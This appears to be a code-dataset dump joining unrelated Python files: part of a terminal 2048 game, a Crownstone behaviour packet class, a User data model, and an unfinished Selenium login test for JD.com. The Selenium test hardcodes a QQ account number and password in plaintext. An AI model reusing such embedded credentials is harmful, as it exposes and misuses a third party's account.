a1 = Color1a1
else:
a1 = Color2a1
if a[2] == 0:
a2 = Color1a2
else:
a2 = Color2a2
if a[3] == 0:
a3 = Color1a3
else:
a3 = Color2a3
if b[0] == 0:
b0 = Color1b0
else:
b0 = Color2b0
if b[1] == 0:
b1 = Color1b1
else:
b1 = Color2b1
if b[2] == 0:
b2 = Color1b2
else:
b2 = Color2b2
if b[3] == 0:
b3 = Color1b3
else:
b3 = Color2b3
if c[0] == 0:
c0 = Color1c0
else:
c0 = Color2c0
if c[1] == 0:
c1 = Color1c1
else:
c1 = Color2c1
if c[2] == 0:
c2 = Color1c2
else:
c2 = Color2c2
if c[3] == 0:
c3 = Color1c3
else:
c3 = Color2c3
if d[0] == 0:
d0 = Color1d0
else:
d0 = Color2d0
if d[1] == 0:
d1 = Color1d1
else:
d1 = Color2d1
if d[2] == 0:
d2 = Color1d2
else:
d2 = Color2d2
if d[3] == 0:
d3 = Color1d3
else:
d3 = Color2d3
# handling several digit numbers, first row
if len(str(a[0])) == 1:
partBetween1 = ' │ '
elif len(str(a[0])) == 2:
partBetween1 = ' │ '
elif len(str(a[0])) == 3:
partBetween1 = ' │ '
elif len(str(a[0])) == 4:
partBetween1 = '│ '
if len(str(a[1])) == 1:
partBetween2 = ' │ '
elif len(str(a[1])) == 2:
partBetween2 = ' │ '
elif len(str(a[1])) == 3:
partBetween2 = ' │ '
elif len(str(a[1])) == 4:
partBetween2 = '│ '
if len(str(a[2])) == 1:
partBetween3 = ' │ '
elif len(str(a[2])) == 2:
partBetween3 = ' │ '
elif len(str(a[2])) == 3:
partBetween3 = ' │ '
elif len(str(a[2])) == 4:
partBetween3 = '│ '
if len(str(a[3])) == 1:
partRight1 = ' │ '
elif len(str(a[3])) == 2:
partRight1 = ' │ '
elif len(str(a[3])) == 3:
partRight1 = ' │ '
elif len(str(a[3])) == 4:
partRight1 = '│ '
# digits: second row
if len(str(b[0])) == 1:
partBetween4 = ' │ '
elif len(str(b[0])) == 2:
partBetween4 = ' │ '
elif len(str(b[0])) == 3:
partBetween4 = ' │ '
elif len(str(b[0])) == 4:
partBetween4 = '│ '
if len(str(b[1])) == 1:
partBetween5 = ' │ '
elif len(str(b[1])) == 2:
partBetween5 = ' │ '
elif len(str(b[1])) == 3:
partBetween5 = ' │ '
elif len(str(b[1])) == 4:
partBetween5 = '│ '
if len(str(b[2])) == 1:
partBetween6 = ' │ '
elif len(str(b[2])) == 2:
partBetween6 = ' │ '
elif len(str(b[2])) == 3:
partBetween6 = ' │ '
elif len(str(b[2])) == 4:
partBetween6 = '│ '
if len(str(b[3])) == 1:
partRight2 = ' │ '
elif len(str(b[3])) == 2:
partRight2 = ' │ '
elif len(str(b[3])) == 3:
partRight2 = ' │ '
elif len(str(b[3])) == 4:
partRight2 = '│ '
# digits: third row
if len(str(c[0])) == 1:
partBetween7 = ' │ '
elif len(str(c[0])) == 2:
partBetween7 = ' │ '
elif len(str(c[0])) == 3:
partBetween7 = ' │ '
elif len(str(c[0])) == 4:
partBetween7 = '│ '
if len(str(c[1])) == 1:
partBetween8 = ' │ '
elif len(str(c[1])) == 2:
partBetween8 = ' │ '
elif len(str(c[1])) == 3:
partBetween8 = ' │ '
elif len(str(c[1])) == 4:
partBetween8 = '│ '
if len(str(c[2])) == 1:
partBetween9 = ' │ '
elif len(str(c[2])) == 2:
partBetween9 = ' │ '
elif len(str(c[2])) == 3:
partBetween9 = ' │ '
elif len(str(c[2])) == 4:
partBetween9 = '│ '
if len(str(c[3])) == 1:
partRight3 = ' │ '
elif len(str(c[3])) == 2:
partRight3 = ' │ '
elif len(str(c[3])) == 3:
partRight3 = ' │ '
elif len(str(c[3])) == 4:
partRight3 = '│ '
# digits: fourth row
if len(str(d[0])) == 1:
partBetween10 = ' │ '
elif len(str(d[0])) == 2:
partBetween10 = ' │ '
elif len(str(d[0])) == 3:
partBetween10 = ' │ '
elif len(str(d[0])) == 4:
partBetween10 = '│ '
if len(str(d[1])) == 1:
partBetween11 = ' │ '
elif len(str(d[1])) == 2:
partBetween11 = ' │ '
elif len(str(d[1])) == 3:
partBetween11 = ' │ '
elif len(str(d[1])) == 4:
partBetween11 = '│ '
if len(str(d[2])) == 1:
partBetween12 = ' │ '
elif len(str(d[2])) == 2:
partBetween12 = ' │ '
elif len(str(d[2])) == 3:
partBetween12 = ' │ '
elif len(str(d[2])) == 4:
partBetween12 = '│ '
if len(str(d[3])) == 1:
partRight4 = ' │ '
elif len(str(d[3])) == 2:
partRight4 = ' │ '
elif len(str(d[3])) == 3:
partRight4 = ' │ '
elif len(str(d[3])) == 4:
partRight4 = '│ '
# print part
print("\033[92m" + "Score:" + "\033[0m" + "\033[96m" + " " + str(score) + "\033[0m")
print()
print(' \033[91m' + '┌──────┬──────┬──────┬──────┐' + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '│ ' + '\033[0m' + a0 + '\033[91m' + partBetween1 + '\033[0m' + a1 + '\033[91m' + partBetween2 + '\033[0m' + a2 + '\033[91m' + partBetween3 + '\033[0m' + a3 + '\033[91m' + partRight1 + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '├──────┼──────┼──────┼──────┤' + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '│ ' + '\033[0m' + b0 + '\033[91m' + partBetween4 + '\033[0m' + b1 + '\033[91m' + partBetween5 + '\033[0m' + b2 + '\033[91m' + partBetween6 + '\033[0m' + b3 + '\033[91m' + partRight2 + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '├──────┼──────┼──────┼──────┤' + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '│ ' + '\033[0m' + c0 + '\033[91m' + partBetween7 + '\033[0m' + c1 + '\033[91m' + partBetween8 + '\033[0m' + c2 + '\033[91m' + partBetween9 + '\033[0m' + c3 + '\033[91m' + partRight3 + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '├──────┼──────┼──────┼──────┤' + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '│ ' + '\033[0m' + d0 + '\033[91m' + partBetween10 + '\033[0m' + d1 + '\033[91m' + partBetween11 + '\033[0m' + d2 + '\033[91m' + partBetween12 + '\033[0m' + d3 + '\033[91m' + partRight4 + '\033[0m')
print(' \033[91m' + '│ │ │ │ │' + '\033[0m')
print(' \033[91m' + '└──────┴──────┴──────┴──────┘' + '\033[0m')
print()
# checking the end of the game, in case if you achive 2048 or you don't have more moves
def checking():
if (2048 in a) or (2048 in b) or (2048 in c) or (2048 in d):
print()
print("\033[92m" + "You win!!!" + "\033[0m")
print()
quit()
elif (a[0] == 0) or (a[1] == 0) or (a[2] == 0) or (a[3] == 0):
pass
elif (b[0] == 0) or (b[1] == 0) or (b[2] == 0) or (b[3] == 0):
pass
elif (c[0] == 0) or (c[1] == 0) or (c[2] == 0) or (c[3] == 0):
pass
elif (d[0] == 0) or (d[1] == 0) or (d[2] == 0) or (d[3] == 0):
pass
elif (a[0] == a[1]) or (a[0] == b[0]):
pass
elif (a[2] == a[1]) or (a[2] == a[3]) or (a[2] == b[2]):
pass
elif (b[1] == b[0]) or (b[1] == a[1]) or (b[1] == b[2]) or (b[1] == c[1]):
pass
elif (b[3] == b[2]) or (b[3] == a[3]) or (b[3] == c[3]):
pass
elif (c[0] == b[0]) or (c[0] == d[0]) or (c[0] == c[1]):
pass
elif (c[2] == c[1]) or (c[2] == c[3]) or (c[2] == b[2]) or (c[2] == d[2]):
pass
elif (d[1] == d[0]) or (d[1] == d[2]) or (d[1] == c[1]):
pass
elif (d[3] == c[3]) or (d[3] == d[2]):
pass
else:
print()
print("\033[92m" + "No more moves! Game over!" + "\033[92m")
print()
quit()
# Put 2 (90% of the cases) or 4 (10% of the cases) to an empty random place (if there is), if the board changed.
def randNum():
if dontMove == 1:
randomList = list()
randomItem = list()
for i in range(len(a)):
if a[i] == 0:
randomItem.append(i)
randomList.append("a")
for i in range(len(b)):
if b[i] == 0:
randomItem.append(i)
randomList.append("b")
for i in range(len(c)):
if c[i] == 0:
randomItem.append(i)
randomList.append("c")
for i in range(len(d)):
if d[i] == 0:
randomItem.append(i)
randomList.append("d")
# 2 or 4
if len(randomList) != 0:
import random
chosen = random.randint(0,len(randomList)-1)
row = randomList[chosen]
column = randomItem[chosen]
twoOrFourlot = random.randint(1,10)
if twoOrFourlot == 1:
twoOrFour = 4
else:
twoOrFour = 2
if row == "a":
a[column] = twoOrFour
if row == "b":
b[column] = twoOrFour
if row == "c":
c[column] = twoOrFour
if row == "d":
d[column] = twoOrFour
# First board printing
a = [0, 0, 0, 0]
b = [0, 0, 0, 0]
c = [0, 0, 0, 0]
d = [0, 0, 0, 0]
from functions2048 import coolStart
import os
game = 1
print()
print()
while game == 1:
start = input("\033[92m" + "Press \'s\' to start the game! (or \'x\' to EXIT): " + "\033[0m")
if start == "s":
score = int()
dontMove = 1
randNum()
randNum()
printing()
game = 0
elif start == "x":
quit()
else:
pass
# The game starts here:
while game < 1:
key = input("\033[92m" + "Select a direction and press enter (use \'x\' to EXIT): " + "\033[0m")
# UP direction with 'w'
# Exclusion of false movements caused by zeros
if key == "w":
dontMove = 0
for j in range(4):
if a[j] == 0:
if b[j] == 0:
if c[j] == 0:
if d[j] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if b[j] == 0:
if c[j] == 0:
if d[j] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if c[j] == 0:
if d[j] == 0:
pass
else:
dontMove = 1
# UP sorting
for j in range(4):
for i in range(3):
if a[j] == 0:
a[j] = b[j]
b[j] = c[j]
c[j] = d[j]
d[j] = 0
else:
for i in range(2):
if b[j] == 0:
b[j] = c[j]
c[j] = d[j]
d[j] = 0
else:
if c[j] == 0:
c[j] = d[j]
d[j] = 0
# UP to add up similar numbers
for j in range(4):
if a[j] != 0:
if a[j] == b[j]:
a[j] = a[j] + b[j]
score = score + a[j]
b[j] = c[j]
c[j] = d[j]
d[j] = 0
dontMove = 1
if b[j] != 0:
if b[j] == c[j]:
b[j] = b[j] + c[j]
score = score + b[j]
c[j] = d[j]
d[j] = 0
dontMove = 1
if c[j] != 0:
if c[j] == d[j]:
c[j] = c[j] + d[j]
score = score + c[j]
d[j] = 0
dontMove = 1
j = j + 1
randNum()
printing()
checking()
# DOWN direction with 's'
elif key == "s":
dontMove = 0
for j in range(4):
if d[j] == 0:
if c[j] == 0:
if b[j] == 0:
if a[j] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if c[j] == 0:
if b[j] == 0:
if a[j] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if b[j] == 0:
if a[j] == 0:
pass
else:
dontMove = 1
# DOWN sorting
for j in range(4):
for i in range(3):
if d[j] == 0:
d[j] = c[j]
c[j] = b[j]
b[j] = a[j]
a[j] = 0
else:
for i in range(2):
if c[j] == 0:
c[j] = b[j]
b[j] = a[j]
a[j] = 0
else:
if b[j] == 0:
b[j] = a[j]
a[j] = 0
# DOWN to add up similar numbers
j = 0
while j < 4:
if d[j] != 0:
if d[j] == c[j]:
d[j] = d[j] + c[j]
score = score + d[j]
c[j] = b[j]
b[j] = a[j]
a[j] = 0
dontMove = 1
if c[j] != 0:
if c[j] == b[j]:
c[j] = c[j] + b[j]
score = score + c[j]
b[j] = a[j]
a[j] = 0
dontMove = 1
if b[j] != 0:
if b[j] == a[j]:
b[j] = b[j] + a[j]
score = score + b[j]
a[j] = 0
dontMove = 1
j = j + 1
randNum()
printing()
checking()
# LEFT direction with 'a'
elif key == "a":
dontMove = 0
# LEFT First row
if a[0] == 0:
if a[1] == 0:
if a[2] == 0:
if a[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if a[1] == 0:
if a[2] == 0:
if a[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if a[2] == 0:
if a[3] == 0:
pass
else:
dontMove = 1
# LEFT Second row
if b[0] == 0:
if b[1] == 0:
if b[2] == 0:
if b[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if b[1] == 0:
if b[2] == 0:
if b[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if b[2] == 0:
if b[3] == 0:
pass
else:
dontMove = 1
# LEFT Third row
if c[0] == 0:
if c[1] == 0:
if c[2] == 0:
if c[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if c[1] == 0:
if c[2] == 0:
if c[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if c[2] == 0:
if c[3] == 0:
pass
else:
dontMove = 1
# LEFT Fourth row
if d[0] == 0:
if d[1] == 0:
if d[2] == 0:
if d[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if d[1] == 0:
if d[2] == 0:
if d[3] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if d[2] == 0:
if d[3] == 0:
pass
else:
dontMove = 1
# LEFT sorting, first row
for i in range(3):
if a[0] == 0:
a[0] = a[1]
a[1] = a[2]
a[2] = a[3]
a[3] = 0
else:
for i in range(2):
if a[1] == 0:
a[1] = a[2]
a[2] = a[3]
a[3] = 0
else:
if a[2] == 0:
a[2] = a[3]
a[3] = 0
# LEFT sorting, second row
for i in range(3):
if b[0] == 0:
b[0] = b[1]
b[1] = b[2]
b[2] = b[3]
b[3] = 0
else:
for i in range(2):
if b[1] == 0:
b[1] = b[2]
b[2] = b[3]
b[3] = 0
else:
if b[2] == 0:
b[2] = b[3]
b[3] = 0
# LEFT sorting, third row
for i in range(3):
if c[0] == 0:
c[0] = c[1]
c[1] = c[2]
c[2] = c[3]
c[3] = 0
else:
for i in range(2):
if c[1] == 0:
c[1] = c[2]
c[2] = c[3]
c[3] = 0
else:
if c[2] == 0:
c[2] = c[3]
c[3] = 0
# LEFT sorting, fourth row
for i in range(3):
if d[0] == 0:
d[0] = d[1]
d[1] = d[2]
d[2] = d[3]
d[3] = 0
else:
for i in range(2):
if d[1] == 0:
d[1] = d[2]
d[2] = d[3]
d[3] = 0
else:
if d[2] == 0:
d[2] = d[3]
d[3] = 0
# LEFT to add up similar numbers, first row
if a[0] != 0:
if a[0] == a[1]:
a[0] = a[0] + a[1]
score = score + a[0]
a[1] = a[2]
a[2] = a[3]
a[3] = 0
dontMove = 1
if a[1] != 0:
if a[1] == a[2]:
a[1] = a[1] + a[2]
score = score + a[1]
a[2] = a[3]
a[3] = 0
dontMove = 1
if a[2] != 0:
if a[2] == a[3]:
a[2] = a[2] + a[3]
score = score + a[2]
a[3] = 0
dontMove = 1
# LEFT to add up similar numbers, second row
if b[0] != 0:
if b[0] == b[1]:
b[0] = b[0] + b[1]
score = score + b[0]
b[1] = b[2]
b[2] = b[3]
b[3] = 0
dontMove = 1
if b[1] != 0:
if b[1] == b[2]:
b[1] = b[1] + b[2]
score = score + b[1]
b[2] = b[3]
b[3] = 0
dontMove = 1
if b[2] != 0:
if b[2] == b[3]:
b[2] = b[2] + b[3]
score = score + b[2]
b[3] = 0
dontMove = 1
# LEFT to add up similar numbers, third row
if c[0] != 0:
if c[0] == c[1]:
c[0] = c[0] + c[1]
score = score + c[0]
c[1] = c[2]
c[2] = c[3]
c[3] = 0
dontMove = 1
if c[1] != 0:
if c[1] == c[2]:
c[1] = c[1] + c[2]
score = score + c[1]
c[2] = c[3]
c[3] = 0
dontMove = 1
if c[2] != 0:
if c[2] == c[3]:
c[2] = c[2] + c[3]
score = score + c[2]
c[3] = 0
dontMove = 1
# LEFT to add up similar numbers, fourth row
if d[0] != 0:
if d[0] == d[1]:
d[0] = d[0] + d[1]
score = score + d[0]
d[1] = d[2]
d[2] = d[3]
d[3] = 0
dontMove = 1
if d[1] != 0:
if d[1] == d[2]:
d[1] = d[1] + d[2]
score = score + d[1]
d[2] = d[3]
d[3] = 0
dontMove = 1
if d[2] != 0:
if d[2] == d[3]:
d[2] = d[2] + d[3]
score = score + d[2]
d[3] = 0
dontMove = 1
randNum()
printing()
checking()
# RIGHT direction with 'd'
elif key == "d":
dontMove = 0
# RIGHT First row
if a[3] == 0:
if a[2] == 0:
if a[1] == 0:
if a[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if a[2] == 0:
if a[1] == 0:
if a[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if a[1] == 0:
if a[0] == 0:
pass
else:
dontMove = 1
# RIGHT Second row
if b[3] == 0:
if b[2] == 0:
if b[1] == 0:
if b[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if b[2] == 0:
if b[1] == 0:
if b[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if b[1] == 0:
if b[0] == 0:
pass
else:
dontMove = 1
# RIGHT Third row
if c[3] == 0:
if c[2] == 0:
if c[1] == 0:
if c[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if c[2] == 0:
if c[1] == 0:
if c[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if c[1] == 0:
if c[0] == 0:
pass
else:
dontMove = 1
# RIGHT Fourth row
if d[3] == 0:
if d[2] == 0:
if d[1] == 0:
if d[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
dontMove = 1
else:
if d[2] == 0:
if d[1] == 0:
if d[0] == 0:
pass
else:
dontMove = 1
else:
dontMove = 1
else:
if d[1] == 0:
if d[0] == 0:
pass
else:
dontMove = 1
# RIGHT sorting, first row
for i in range(3):
if a[3] == 0:
a[3] = a[2]
a[2] = a[1]
a[1] = a[0]
a[0] = 0
else:
for i in range(2):
if a[2] == 0:
a[2] = a[1]
a[1] = a[0]
a[0] = 0
else:
if a[1] == 0:
a[1] = a[0]
a[0] = 0
# RIGHT sorting, second row
for i in range(3):
if b[3] == 0:
b[3] = b[2]
b[2] = b[1]
b[1] = b[0]
b[0] = 0
else:
for i in range(2):
if b[2] == 0:
b[2] = b[1]
b[1] = b[0]
b[0] = 0
else:
if b[1] == 0:
b[1] = b[0]
b[0] = 0
# RIGHT sorting, third row
for i in range(3):
if c[3] == 0:
c[3] = c[2]
c[2] = c[1]
c[1] = c[0]
c[0] = 0
else:
for i in range(2):
if c[2] == 0:
c[2] = c[1]
c[1] = c[0]
c[0] = 0
else:
if c[1] == 0:
c[1] = c[0]
c[0] = 0
# RIGHT sorting, fourth row
for i in range(3):
if d[3] == 0:
d[3] = d[2]
d[2] = d[1]
d[1] = d[0]
d[0] = 0
else:
for i in range(2):
if d[2] == 0:
d[2] = d[1]
d[1] = d[0]
d[0] = 0
else:
if d[1] == 0:
d[1] = d[0]
d[0] = 0
# RIGHT to add up similar numbers, first row
if a[3] != 0:
if a[3] == a[2]:
a[3] = a[3] + a[2]
score = score + a[3]
a[2] = a[1]
a[1] = a[0]
a[0] = 0
dontMove = 1
if a[2] != 0:
if a[2] == a[1]:
a[2] = a[2] + a[1]
score = score + a[2]
a[1] = a[0]
a[0] = 0
dontMove = 1
if a[1] != 0:
if a[1] == a[0]:
a[1] = a[1] + a[0]
score = score + a[1]
a[0] = 0
dontMove = 1
# RIGHT to add up similar numbers, second row
if b[3] != 0:
if b[3] == b[2]:
b[3] = b[3] + b[2]
score = score + b[3]
b[2] = b[1]
b[1] = b[0]
b[0] = 0
dontMove = 1
if b[2] != 0:
if b[2] == b[1]:
b[2] = b[2] + b[1]
score = score + b[2]
b[1] = b[0]
b[0] = 0
dontMove = 1
if b[1] != 0:
if b[1] == b[0]:
b[1] = b[1] + b[0]
score = score + b[1]
b[0] = 0
dontMove = 1
# RIGHT to add up similar numbers, third row
if c[3] != 0:
if c[3] == c[2]:
c[3] = c[3] + c[2]
score = score + c[3]
c[2] = c[1]
c[1] = c[0]
c[0] = 0
dontMove = 1
if c[2] != 0:
if c[2] == c[1]:
c[2] = c[2] + c[1]
score = score + c[2]
c[1] = c[0]
c[0] = 0
dontMove = 1
if c[1] != 0:
if c[1] == c[0]:
c[1] = c[1] + c[0]
score = score + c[1]
c[0] = 0
dontMove = 1
# RIGHT to add up similar numbers, fourth row
if d[3] != 0:
if d[3] == d[2]:
d[3] = d[3] + d[2]
score = score + d[3]
d[2] = d[1]
d[1] = d[0]
d[0] = 0
dontMove = 1
if d[2] != 0:
if d[2] == d[1]:
d[2] = d[2] + d[1]
score = score + d[2]
d[1] = d[0]
d[0] = 0
dontMove = 1
if d[1] != 0:
if d[1] == d[0]:
d[1] = d[1] + d[0]
score = score + d[1]
d[0] = 0
dontMove = 1
randNum()
printing()
checking()
# Exit button: 'x'
elif key == "x":
print()
print("\033[92m" + "Thank you for playing!" + "\033[0m")
print()
quit()
# Wrong button handling
else:
print("Not valid key")
|
986,988 | c4ad3b39066cf20d1e555d259ad6274c7a40e59c | import json
from BluenetLib.lib.packets.behaviour.BehaviourSubClasses import ActiveDays, BehaviourTimeContainer, BehaviourTime, \
BehaviourPresence
from BluenetLib.lib.packets.behaviour.BehaviourTypes import BehaviourType, BehaviourTimeType, DAY_START_TIME_SECONDS_SINCE_MIDNIGHT
from BluenetLib.lib.util.DataStepper import DataStepper
from BluenetLib.lib.util.fletcher import fletcher32_uint8Arr
DEFAULT_ACTIVE_DAYS = ActiveDays()
DEFAULT_TIME = BehaviourTimeContainer(
BehaviourTime().fromType(BehaviourTimeType.afterSunset),
BehaviourTime().fromType(BehaviourTimeType.afterSunrise),
)
class BehaviourBase:
def __init__(self, profileIndex=0, behaviourType=BehaviourType.behaviour, intensity=100, activeDays=DEFAULT_ACTIVE_DAYS, time=DEFAULT_TIME, presence=None, endCondition=None, idOnCrownstone=None):
self.profileIndex = profileIndex
self.behaviourType = behaviourType
self.intensity = max(0, min(100, intensity))
self.activeDays = activeDays
self.fromTime = time.fromTime
self.untilTime = time.untilTime
self.presence = presence
self.endCondition = endCondition
self.idOnCrownstone = idOnCrownstone
self.valid = True
def setDimPercentage(self, value):
self.intensity = value
return self
def setTimeAllday(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterMidnight, dayStartTimeSecondsSinceMidnight),
self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterMidnight, dayStartTimeSecondsSinceMidnight)
return self
def setTimeWhenDark(self):
self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset)
self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise)
return self
def setTimeWhenSunUp(self):
self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise)
self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset)
return self
def setTimeFromSunrise(self, offsetMinutes = 0):
self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise, offsetSeconds=60*offsetMinutes)
return self
def setTimeFromSunset(self, offsetMinutes = 0):
self.fromTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset, offsetSeconds=60*offsetMinutes)
return self
def setTimeToSunrise(self, offsetMinutes = 0):
self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunrise, offsetSeconds=60*offsetMinutes)
return self
def setTimeToSunset(self, offsetMinutes = 0):
self.untilTime = BehaviourTime().fromType(BehaviourTimeType.afterSunset, offsetSeconds=60 * offsetMinutes)
return self
def setTimeFrom(self, hours, minutes):
self.fromTime = BehaviourTime().fromTime(hours, minutes)
return self
def setTimeTo(self, hours, minutes):
self.untilTime = BehaviourTime().fromTime(hours, minutes)
return self
"""
The payload is made up from
- BehaviourType 1B
- Intensity 1B
- profileIndex 1B
- ActiveDays 1B
- From 5B
- Until 5B
- Presence 13B --> for Switch Behaviour and Smart Timer
- End Condition 17B --> for Smart Timer
"""
def fromData(self, data):
payload = DataStepper(data)
firstByte = payload.getUInt8()
if not BehaviourType.has_value(firstByte):
self.valid = False
return self
self.behaviourType = BehaviourType(firstByte)
self.intensity = payload.getUInt8()
self.profileIndex = payload.getUInt8()
self.activeDays = ActiveDays().fromData(payload.getUInt8())
self.fromTime = BehaviourTime().fromData(payload.getAmountOfBytes(5)) # 4 5 6 7 8
self.untilTime = BehaviourTime().fromData(payload.getAmountOfBytes(5)) # 9 10 11 12 13
if self.fromTime.valid == False or self.untilTime.valid == False:
self.valid = False
return self
if self.behaviourType == BehaviourType.behaviour:
if payload.length >= 14 + 13:
self.presence = BehaviourPresence().fromData(
payload.getAmountOfBytes(13)) # 14 15 16 17 18 19 20 21 22 23 24 25 26
if not self.presence.valid:
self.valid = False
return self
else:
self.valid = False
return self
if self.behaviourType == BehaviourType.smartTimer:
if payload.length >= 14 + 13 + 17:
presence = BehaviourPresence().fromData(payload.getAmountOfBytes(17))
if not presence.valid:
self.valid = False
return self
self.endCondition = presence
else:
self.valid = False
return self
def getPacket(self):
arr = []
arr.append(self.behaviourType.value)
arr.append(self.intensity)
arr.append(self.profileIndex)
arr.append(self.activeDays.getMask())
arr += self.fromTime.getPacket()
arr += self.untilTime.getPacket()
if self.presence is not None:
arr += self.presence.getPacket()
if self.endCondition is not None:
arr += self.endCondition.presence.getPacket()
return arr
def getHash(self):
return fletcher32_uint8Arr(self._getPaddedPacket())
def getDictionary(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
typeString = "BEHAVIOUR"
if self.behaviourType == BehaviourType.twilight:
typeString = "TWILIGHT"
dataDictionary = {}
if self.behaviourType == BehaviourType.twilight:
dataDictionary["action"] = {"type": "DIM_WHEN_TURNED_ON", "data": self.intensity}
dataDictionary["time"] = self._getTimeDictionary(dayStartTimeSecondsSinceMidnight)
else:
# behaviour and smart timer have the same format
dataDictionary["action"] = {"type": "BE_ON", "data": self.intensity}
dataDictionary["time"] = self._getTimeDictionary(dayStartTimeSecondsSinceMidnight)
if self.presence is not None:
dataDictionary["presence"] = self.presence.getDictionary()
if self.endCondition is not None:
endConditionDictionary = {}
endConditionDictionary["type"] = "PRESENCE_AFTER"
endConditionDictionary["presence"] = self.endCondition.getDictionary()
dataDictionary["endCondition"] = endConditionDictionary
returnDict = {"type": typeString, "data": dataDictionary, "activeDays": self.activeDays.getDictionary(),
"idOnCrownstone": self.idOnCrownstone, "profileIndex": self.profileIndex}
return returnDict
def _getTimeDictionary(self, dayStartTimeSecondsSinceMidnight=DAY_START_TIME_SECONDS_SINCE_MIDNIGHT):
returnDict = {}
# check if always
if self.fromTime.timeType == BehaviourTimeType.afterMidnight and self.fromTime.offset == dayStartTimeSecondsSinceMidnight and self.untilTime.timeType == BehaviourTimeType.afterMidnight and self.untilTime.offset == dayStartTimeSecondsSinceMidnight:
returnDict["type"] = "ALL_DAY"
return returnDict
# its not always! construct the from and to parts.
returnDict["type"] = "RANGE"
returnDict["from"] = self.fromTime.getDictionary()
returnDict["to"] = self.untilTime.getDictionary()
return returnDict
def _getPaddedPacket(self):
packet = self.getPacket()
if len(packet) % 2 != 0:
packet.append(0)
return packet
def __str__(self):
return json.dumps(self.getDictionary()) |
986,989 | c9037ef24463d9ef868dfbda629c4ca6758c5f1d | from market.models import DatabaseModel
class User(DatabaseModel):
type = 'users'
def __init__(self, public_key, time_added, role_id=None, profile_id=None, loan_request_ids=None, campaign_ids=None, mortgage_ids=None, investment_ids=None):
super(User, self).__init__()
self._public_key = public_key
self._time_added = time_added
self._role_id = role_id
self._profile_id = profile_id
self._loan_request_ids = loan_request_ids or []
self._campaign_ids = campaign_ids or []
self._mortgage_ids = mortgage_ids or []
self._investment_ids = investment_ids or []
self._candidate = None
@property
def user_key(self):
return self._public_key
@property
def time_added(self):
return self._time_added
@property
def profile_id(self):
return self._profile_id
@property
def loan_request_ids(self):
return self._loan_request_ids
@property
def mortgage_ids(self):
return self._mortgage_ids
@property
def investment_ids(self):
return self._investment_ids
@property
def role_id(self):
return self._role_id
@property
def campaign_ids(self):
return self._campaign_ids
def generate_id(self, force=False):
if force:
raise IndexError("User key is immutable")
return self.user_key
@profile_id.setter
def profile_id(self, value):
self._profile_id = value
@role_id.setter
def role_id(self, value):
self._role_id = value
|
986,990 | aa2817acba8daf05ca353186e4faec4e4e9a52a1 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
__author__ = 'wan'
import os,sys
import string
import time
import unittest
import random
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common import action_chains as action
reload(sys)
sys.setdefaultencoding('utf-8')
"""关于京东账号登录的测试脚本."""
#set website url
url = 'https://passport.jd.com/new/login.aspx'
#QQ
qq = '3485126980'
qq_passwd = '098765!@#'
wx = ''
wx_passwd = ''
class TestEnvironment(unittest.TestCase):
""" Test Environment
1) set Browser driver.
2) RunTest after,close browser
"""
def setUp(self):
#self.driver = webdriver.Firefox()
#self.driver = webdriver.Chrome('C:\Program Files (x86)\Google\Chrome\Application\chromedriver')
self.driver = webdriver.Chrome('/Applications/Google Chrome.app/Contents/MacOS/chromedriver')
self.driver.get(url)
def tearDown(self):
self.driver.close()
class TestLoginCooperationAccount(TestEnvironment):
"""
合作网站账号登陆,主要有QQ、微信.
"""
def test_login_qq(self):
""" TestCase 01: QQ login."""
driver = self.driver
driver.find_element_by_xpath("//ul/li[2]/a").click()
driver.switch_to_window(driver.window_handles[0])
driver.switch_to.frame(0)
